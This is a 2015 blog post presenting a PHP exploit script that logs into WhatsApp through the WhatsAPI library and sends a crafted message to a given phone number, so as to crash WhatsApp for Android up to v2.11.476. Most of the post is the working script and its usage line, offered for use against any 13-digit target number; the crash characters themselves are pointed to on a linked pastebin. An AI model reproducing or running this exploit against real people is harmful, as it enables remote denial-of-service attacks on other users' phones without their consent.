HACKER ANGELWHITE GALC

Friday, May 15, 2015

[PHP] Crashing WhatsApp using WhatsAPI EXPLOIT






Script usage
root@rodrix:~# php wacrash.php 549XXXXXXXXXX

Remember that the contact number you are going to crash must be 13 digits long. In the $msg variable, copy and paste the contents of the pastebin that I leave in the comment, which contains the special characters that crash WhatsApp.

Code: PHP
<?php

/*
 *      Title: WhatsApp Remote Crash with PHP
 *      Product: WhatsApp
 *      Vendor Homepage: http://www.whatsapp.com
 *      Vulnerable Version(s): 2.11.476
 *      Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3
 *      Mirror: http://pastebin.com/Ktu45GN0
 *      Date: 05/02/2015
 *
 *      Author Exploit:
 *              Rodrigo Avila - @el_rodrix - <rodrigo398@hotmail.com>
 *      Credits:
 *              Daniel Godoy - @0xhielasangre - <danielgodoy@gobiernofederal.com>
 *              Gonza Cabrera - @Gonnza_Cabrera - <gonnza.cabrera@gmail.com>
 *
 *      Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
 *                 http://underc0de.org/foro/android/(poc)-crashear-la-app-de-un-contacto-de-whatsapp-(android)/msg82880/
 *                 http://www.exploit-db.com/exploits/35637/
 *                 http://www.exploit-db.com/exploits/32865/
 *
 *      Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
 *      It uses WhatsAPI library, that provides us with the options of registration, reading/sending messages, and even
 *      engaging in an interactive conversation over WhatsApp protocol
 */

require 'src/whatsprot.class.php';

// Non-blocking read of one line from a stream; returns null when no input is pending.
// (Helper carried over with the script; it is not called below.)
function fgets_u($pStdn)
{
    $pArr = array($pStdn);
    // stream_select() takes its arrays by reference, so pass variables, not expressions.
    $write = NULL;
    $except = NULL;

    if (false === ($num_changed_streams = stream_select($pArr, $write, $except, 0))) {
        print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");

        return FALSE;
    } elseif ($num_changed_streams > 0) {
        return trim(fgets($pStdn, 1024));
    }
    return null;
}

$nickname = "RemoteExecution";
$sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00)
$imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
$password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp
$msg = "RemoteExecution"; //Copy paste and send this message -> http://pastebin.com/bStYBbpd
$usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n";

if ($argc < 2) {
    echo $usage;
    exit(1);
}

// The destination must be numeric and exactly 13 digits long; otherwise print the usage text.
if (is_numeric($_SERVER['argv'][1])) {
    if (strlen($_SERVER['argv'][1]) == 13) {
        $dst = $_SERVER['argv'][1];
        echo "[] Logging in as '$nickname' ($sender)\n";
        $wa = new WhatsProt($sender, $imei, $nickname, false);

        $wa->connect();
        $wa->loginWithPassword($password);

        echo "\n[] Send message to $dst: $msg\n";
        $wa->sendMessage($dst, $msg);
        echo "\n";
        exit(0);
    } else {
        echo $usage;
    }
} else {
    echo $usage;
}

Attached is a screenshot of the moment the WhatsApp app crashes on Android. For this PoC, a Samsung Galaxy S4 with WhatsApp+ v6.65 was used.

Device information:



WhatsApp+ crashes:



WhatsApp+ crashes:



WhatsApp app information:
